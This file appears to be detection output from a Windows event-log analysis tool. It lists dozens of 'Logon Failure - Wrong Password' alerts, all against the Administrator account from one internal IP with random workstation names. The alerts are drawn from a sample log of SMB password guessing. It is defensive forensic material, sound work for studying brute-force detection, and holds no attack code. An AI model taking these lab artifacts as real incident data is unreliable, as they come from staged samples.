2016-09-20 01:50:14.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17O1jfGX6KQMPgnD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3NaqTqrCiPPfNxZF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:14.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Az7cwIWXUGVIMTv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Djaxf99PVs2VkMy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbTSoTdaQ0Y4c9Gw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g9aTo4QBHfrgPYZ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dpHKjYzZTn0ruIrf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HqhPnV6tc8airRqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.211 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RIOCqtXh5ji12U5q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RwuGZ0kgg1yToLlr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZSBbd4qBRuzeKBjD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zS1Muxc9gpcqv23 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c6wiIkfkgtso42P1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1ilRmhSB5RfvpVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PuQ47GGBraimypWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UfUsAYWilbwMScpE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.554 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 22ZSltGNwIl0DNDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IYwG9IUpdk5DmM8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4a8kbGxQFHDBodGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KoLqIaO8p3k9kOkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUnonSx3ZBdkyGhu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d1QJziwKhsaJljGV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZhcNRrpODYB9jZxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yi5JE53caVn7n54w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jx6qTASzFp830ud6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b4L8HtBWlmAMTjCf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:15.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F4hVfTwibHreepku : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3TlapK211UT8SO0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.059 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mzzw3uPkn2cgtmlF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aPnfUjwJei5E5BD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.133 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mm1k0eeKAYokIbDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.166 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w8TDNcJ3LMyNtUe1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogKKslkdXvc9f130 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgoy6gMfe5N0UiP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lfjf3d6I8TsBOzvc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vs8DG8s81oOwYoI7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LFkgN1aDoYkQ4qrT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.459 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KMwLokYpcFIYHegd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.507 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6oKradBV4ERsQnKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.549 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0qPzlzfmgrbYTKqQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qKYlBm2lhobHzbjh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DBMu96oqO9tb3f4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tO04Q3eYdzyuy51v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FrIa2UrSrfdhkDCx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: axhhyMrGl95O16Vg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.783 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: atjvfi8QeEDluhL2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.827 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HPBZKUiiKeyQwSr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2SmitfyjO4mxqw5E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nrq1g8ktTQbPTXqn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 943GV3t1muba5IQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPVd28zf85AxdGqd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D6evoSSxcKkHspuc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C4fznmrnIdUH7DzG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwrrYjUV41P0K5Jh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4RBZrALEnH5BKP9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LU6uWH4gs4iHP7rV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCfhZDAH8ufk77zN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TE9pw4UeRldGeKVc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8PKE05MqxE5TwXT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GIE5fmddOPBbCM3u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pveyo4Czx6KWKCGn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zPyyHaRnBec7Qg2x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3b8mudJp5mdkiEW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Y6mjLaCzR28Q2qK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dMsNKWEjeCYYQVqw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I7c5fENhkwO6QfEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cr1wAeMhPgVpwV82 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErpp9Ww6LO37C9k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CYsNpBsGT5zOKe3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sgzUk1Dmttm4AQ3s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hp0c3YYyOSJuBHCR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gkis4H1MIQPHUwqf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lb6mH03qKLb8O7Dz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J10xEmhRNWfJ5FCI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Dujj8A7wwzAwzCp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
